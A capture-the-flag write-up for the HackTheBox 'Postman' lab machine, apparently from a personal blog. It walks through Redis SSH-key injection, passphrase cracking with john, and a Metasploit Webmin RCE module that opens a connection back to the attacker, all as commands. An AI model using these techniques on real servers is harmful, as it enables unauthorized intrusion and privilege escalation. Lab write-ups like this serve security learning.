Postman is an easy marked box in HackTheBox, it just retired and here's my writeup!

First, let's add the hostname postman to the hosts file so that, we don't always need to type in the IP address.

vi /etc/hosts

Hit i (going to input mode)

10.10.10.160     postman

[esc]
:x (saving and exiting)

Now, let's run a nmap scan to see what services are running. We will be checking for all the ports, therefore the -p- option.

nmap -A -T4 -p- 10.10.10.160

 SSL - 21
 http - 80
 Miniserv 1.910 - 10000
 redis - 6379

Miniserv at port 10000, that's something that I haven't seen very often. Let's check if it has a webpage.

https://postman:10000/

We can see a webmin login prompt, trying admin/admin there, doesn't give us anything and I don't think bruteforce is the name of the game here.

Now, the other interesting service available is redis, to check the redis port,

apt-get install redis-tools #installing redis command line tools
redis-cli -h postman #connecting to the postman server via redis-cli
 ping #checking the connection
 pong #we get a pong back, that's nice

Now that we know that the connection works fine, let's quit it.

This version of redis has a common vulnerability. You can check it out at: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html

As suggested by packet storm security, let's try generating a rsa key and see if that works.

ssh-keygen -t rsa -C "redis@postman"

Create the private/public key pair and save them both at ~/HTB/Postman.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt

Now, let's upload the contents of the test.txt file to the redis server.

cat test.txt | redis-cli -h 10.10.10.160 -x set crackit
The -x option tells redis-cli to read the last argument from STDIN, which is our case, is the content of test.txt.

redis-cli -h 10.10.10.160
 config get dir
 config set dbfilename "authorized_keys"
 save
 quit

We saved the contents of our test.txt file as authorized_keys in the server.

Now, lets try to login with the private-public key pair.

ssh -i id_rsa redis@10.10.10.160

You are in!

Got the initial foothold, now time for privesc!

cd /opt/
ls

When you ls there, you should see id_rsa.bak file.
That's interesting, we should checkout if it really is a backup of id_rsa file, in which case, our job will be really easy.

cat id_rsa.bak 

Copy all of it and in another terminal window, in our attacking machine,

vi ~/HTB/Postman/id_rsa.bak

Again, Hit i and go to the input mode and paste everything there.
[esc]
:x To save and exit.

Now, we will try to crack the password used with the rsa key.

updatedb

locate ssh2john.py #finds where ssh2john.py file is

cp $(locate ssh2john.py) . #copies the ssh2john.py file from wherever it is to the present working directory

python ssh2john.py id_rsa.bak > id_rsa.bak.hash #converts it to a john usable format

john id_rsa.bak.hash -wordlist=rockyou.txt #using the rockyou.txt file and john, we try to crack the password

You should get a password, "computer2008".

However, when you try to ssh in, you will be denied.

Now, go back to the window where you are logged in as redis user.

su Matt

Give the password as, computer2008

Boom!

You are user now!

cd ~
cat user.txt

Now, go to the browser and try to login to the webmin using Matt's credentials (notice that it is Matt and not matt).

So, that works.
Now, logout as Matt user from the terminal and webmin.

Back in your kali machine,

msfconsole
 search webmin
 use linux/http/webmin_packageup_rce
 options
 set rhosts postman
 set password computer2008
 set username Matt
 set ssl true
 set lhost <your kali machine's ip>
 exploit

And that should work!

Congratulations, you're root now!

cat /root/root.txt

Thank you for reading, feel free to share it if you like it!
- root@abhizer